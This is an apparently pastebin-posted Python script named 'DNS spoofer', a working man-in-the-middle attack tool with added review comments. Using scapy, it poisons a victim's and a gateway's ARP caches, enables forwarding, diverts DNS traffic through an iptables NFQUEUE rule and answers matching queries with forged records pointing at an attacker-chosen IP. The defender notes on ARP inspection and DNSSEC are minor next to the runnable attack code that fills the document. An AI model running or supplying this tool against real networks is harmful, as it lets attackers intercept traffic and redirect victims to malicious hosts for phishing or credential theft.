JSchmoe

DNS spoofer

Jan 24th, 2016
  1. #!/usr/bin/env python
  2.  
  3. #1. Imports:
  4.  
  5. import logging
  6. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  7. import sys
  8. import time
  9. import threading
  10. import os
  11.  
  12. try:
  13.     from scapy.all import *
  14. except ImportError:
  15.     print("[!]Install scapy to use this module.")
  16.     exit()
  17.    
  18. try:
  19.     from netfilterqueue import NetfilterQueue
  20. except ImportError:
  21.     print("[!]Install NetfilterQueue to use this module.")
  22.     exit()
  23.    
  24. #2. Variables:
  25.  
# NOTE(review): a `global` statement at module scope has no effect; these
# names are already module-level.
global victimIP, victimMAC, gatewayIP, gatewayMAC, spoofDomain, spoofIP

# Positional command-line arguments, read without any count or format check:
# fewer than four arguments raises IndexError on one of these lines.
victimIP = sys.argv[1]  # pdst of the forged reply sent to the victim in poison()
gatewayIP = sys.argv[2]  # psrc claimed in that reply
spoofDomain = sys.argv[3]  # substring tested against the DNS query name in modify()
spoofIP = sys.argv[4]  # rdata of the forged answer record in modify()
  32.  
  33. #3. Functions for ARP spoofing:
  34.  
def getMAC(ip): #Get MAC address using ARP.
    """Return the hardware address that answers an ARP query for *ip*.

    Sends an ARP packet built with only ``pdst`` set (scapy's default
    operation, presumably a who-has request) with a 1 s timeout and no
    retries, and returns the ``hwsrc`` field of the first answer.

    When nothing answers, the loop body never runs and the function falls
    off the end, so the caller receives ``None``.
    """
    ans, unans = sr(ARP(pdst=ip), timeout=1, retry=0, verbose=0)
    for s, r in ans:
        # Only the first (sent, received) pair is ever looked at.
        return r[ARP].hwsrc
  39.        
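# Resolve both hardware addresses up front. getMAC() returns None when no ARP
# reply arrives within its timeout.
gatewayMAC = getMAC(gatewayIP)
victimMAC = getMAC(victimIP)

# Test for the missing reply explicitly. The previous bare `except:` around the
# string concatenation only worked because str + None raises TypeError, and it
# would also have swallowed KeyboardInterrupt and any unrelated error.
if gatewayMAC is None or victimMAC is None:
    print("[!]Error getting MAC address.")
    sys.exit(1)  # non-zero status so a calling script can see the failure

print("[*]Gateway MAC: "+gatewayMAC)
print("[*]Victim MAC: "+victimMAC)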
  49.        
def poison():#Poison the targets.
    """Send one forged ARP reply to the victim and one to the gateway.

    Each packet is an ARP reply (op=2) whose ``psrc`` is the *other* party's
    IP address. ``hwsrc`` is not set here, so it is whatever scapy fills in
    by default -- presumably the sending interface's MAC (confirm against
    scapy's ARP field defaults).

    Defender note: main() calls this every 1.5 s, so what a monitor sees on
    the segment is a steady stream of unsolicited ARP replies and a gateway
    IP whose MAC binding has changed. Dynamic ARP Inspection on the switch,
    or a static ARP entry for the gateway on the host, rejects such replies.
    """
    global victimIP, gatewayIP, victimMAC, gatewayMAC
    # To the victim: "gatewayIP is at <sender's MAC>".
    send(ARP(op=2, pdst=victimIP, psrc=gatewayIP, hwdst=victimMAC), verbose=0)
    # To the gateway: "victimIP is at <sender's MAC>".
    send(ARP(op=2, pdst=gatewayIP, psrc=victimIP, hwdst=gatewayMAC), verbose=0)
  54.    
def restore():#Restore ARP tables.
    """Re-announce the real IP-to-MAC bindings of the victim and the gateway.

    Sends three ARP replies (op=2) in each direction, with ``hwsrc`` set to
    the address learned by getMAC() at start-up and ``hwdst`` set to the
    broadcast address. If this function is not reached, the forged entries
    remain in both caches until they expire or are refreshed.
    """
    global victimIP, gatewayIP, victimMAC, gatewayMAC
    # Tell the gateway the victim's real hardware address.
    send(ARP(op=2, pdst=gatewayIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=3, verbose=0)
    # Tell the victim the gateway's real hardware address.
    send(ARP(op=2, pdst=victimIP, psrc=gatewayIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gatewayMAC), count=3, verbose=0)
  59.    
  60. #4. Functions for DNS spoofing:
  61.  
def modify(packet):
    """NetfilterQueue callback: replace matching DNS queries with a forged answer.

    The queued payload is parsed as an IP packet. Packets without a DNS
    question section, and queries whose name does not contain
    ``spoofDomain``, are accepted unchanged. For a match, the payload is
    replaced with a response that swaps the addresses and UDP ports, copies
    the transaction id and question, and carries one answer record pointing
    at ``spoofIP``.

    The match is a substring test (``in``), so it also hits any query name
    that merely contains ``spoofDomain``.

    Defender note: the forged response is marked authoritative (aa=1), has a
    10 s TTL and carries no DNSSEC signatures, so a validating resolver
    rejects it for a signed zone. Only packets matched by the rule in
    start_iptables() (UDP, destination port 53) reach this callback, so DNS
    carried over TLS or HTTPS never passes through it.
    """
    global spoofDomain, spoofIP
    # Parse the queued payload as an IP packet.
    pkt = IP(packet.get_payload())
    if not pkt.haslayer(DNSQR):
        packet.accept()#Accept if packet is not a DNS query.
    else:# The packet carries a DNS question section.
        if spoofDomain in pkt[DNS].qd.qname:#Modify packet if it matches spoofDomain.
            # Response headers mirror the query: source and destination
            # addresses and ports are swapped, and the DNS id is copied so
            # the reply matches the client's outstanding query.
            spoofed_pkt = IP(dst=pkt[IP].src, src =pkt[IP].dst)/\
                UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \
                an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=spoofIP))
            # Swap the queued packet's payload for the forged response.
            packet.set_payload(str(spoofed_pkt))
            packet.accept()#Make the packet appear legit and sling it back to the victim.
            print("[*]Spoofed request for "+str(pkt[DNS].qd.qname))
        else:
            packet.accept()#Accept if query doesn't match spoofDomain.
  78.        
def listen():
    """Attach modify() to netfilter queue 1 and process packets until the queue stops.

    The queue number must agree with the ``--queue-num 1`` used in
    start_iptables(). run() blocks, which is why main() calls this from a
    separate thread.
    """
    queue = NetfilterQueue()
    queue.bind(1, modify)  # every packet diverted to queue 1 is handed to modify()
    queue.run()
  83.    
  84. #5. Functions for setting up iptables and such:
  85.  
def start_iptables():
    """Enable IPv4 forwarding and divert UDP port 53 traffic to netfilter queue 1.

    The previous value of ip_forward is not recorded, and the return status
    of the iptables command is ignored. The rule matches every UDP packet
    with destination port 53 that traverses nat/PREROUTING, not only the
    victim's.
    """
    # The with-block closes the file when it exits.
    with open("/proc/sys/net/ipv4/ip_forward", "w") as forward_flag:
        forward_flag.write("1\n")
    os.system("iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1")
  91.    
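def stop_iptables():
    """Turn IPv4 forwarding off and remove the NFQUEUE rule added by start_iptables().

    Only the single nat/PREROUTING rule this script installs is deleted.
    Flushing whole tables and deleting all user chains (``iptables -F``,
    ``-X``, ``-t nat -F``, ``-t nat -X``) would also wipe every unrelated
    firewall and NAT rule on the host and leave it with bare default
    policies.
    """
    with open("/proc/sys/net/ipv4/ip_forward", "w") as ipf:
        # NOTE(review): 0 is written unconditionally, so forwarding ends up
        # off even if it was enabled before the script ran.
        ipf.write("0\n")
    # -D with the same rule specification used for -A removes exactly that rule.
    os.system("iptables -t nat -D PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1")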
  100.    
  101. #6. Main function:
  102.  
def main():
    """Start the queue listener, install the redirect, and re-send forged ARP replies until Ctrl-C.

    NOTE(review): clean-up runs only on KeyboardInterrupt. Any other
    exception raised in the loop ends the process with ip_forward still set
    to 1, the NFQUEUE rule still installed and both ARP caches still holding
    the forged entries.
    """
    t = threading.Thread(target=listen)
    # Daemon thread: it does not keep the process alive once main() exits.
    t.daemon = True
    # The listener is started before the iptables rule is added, presumably so
    # that queue 1 has a consumer by the time packets are diverted to it.
    t.start()
    start_iptables()
    print("[*]Starting...")
    while 1:
        try:
            # Re-sent every 1.5 s so the forged entries keep overriding
            # any genuine ARP traffic.
            poison()
            time.sleep(1.5)
        except KeyboardInterrupt:
            print("[*]User requested shutdown.")
            # Remove the redirect first, then re-announce the real bindings.
            stop_iptables()
            restore()
            exit()
  118.            
  119. #7. And here we go!
  120.  
# Entry-point guard. It covers only the call to main(): the argument parsing
# and the two getMAC() lookups at module level run on import as well.
if __name__ == "__main__":
    main()